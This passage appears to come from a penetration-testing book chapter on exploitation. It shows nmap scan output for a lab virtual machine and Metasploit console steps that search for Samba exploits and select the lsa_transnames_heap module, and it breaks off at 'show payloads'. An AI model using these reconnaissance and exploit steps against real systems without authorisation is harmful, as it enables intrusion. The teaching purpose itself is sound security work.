The Joy of Exploitation
69
Starting Nmap 5.20 ( http://nmap.org ) at 2011-03-15 19:35 EDT
Warning: Traceroute does not support idle or connect scan, disabling...
Nmap scan report for 192.168.33.132
Host is up (0.00048s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open
http Apache httpd 2.2.3 ((
Ubuntu
) PHP/5.2.1)
|_html-title: Index of /
139/tcp open
netbios-ssn
Samba
smbd 3.X (workgroup: MSHOME)
445/tcp open
netbios-ssn
Samba
smbd 3.X (workgroup: MSHOME)
MAC Address: 00:0C:29:21:AD:08 (VMware)
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).
. . . SNIP . . .
Host script results:
|_nbstat: NetBIOS name: UBUNTU, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
|_smbv2-enabled: Server doesn't support SMBv2 protocol
| smb-os-discovery:
| OS: Unix (Samba 3.0.24)
| Name: MSHOME\Unknown
|_ System time: 2011-03-15 17:39:57 UTC-4
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 47.11 seconds
We see three open ports: 80, 139, and 445. The message at tells us that
the system is running Ubuntu, and at we see that it is running a version of
Samba 3.
x
and Apache 2.2.3 with PHP 5.2.1.
Let’s search for a Samba exploit and try it against the system:
msf >
search samba
[*] Searching loaded modules for pattern 'samba'...
Auxiliary
=========
Name Rank Description
---- ---- -----------
admin/smb/samba_symlink_traversal normal Samba Symlink Directory Traversal
dos/samba/lsa_addprivs_heap normal Samba lsa_io_privilege_set Heap Overflow
dos/samba/lsa_transnames_heap normal Samba lsa_io_trans_names Heap
Overflow
Exploits
========
Name Rank Description
---- ---- -----------
linux/samba/lsa_transnames_heap good Samba lsa_io_trans_names . . .
. . . SNIP . . .
msf >
use linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) >
show payloads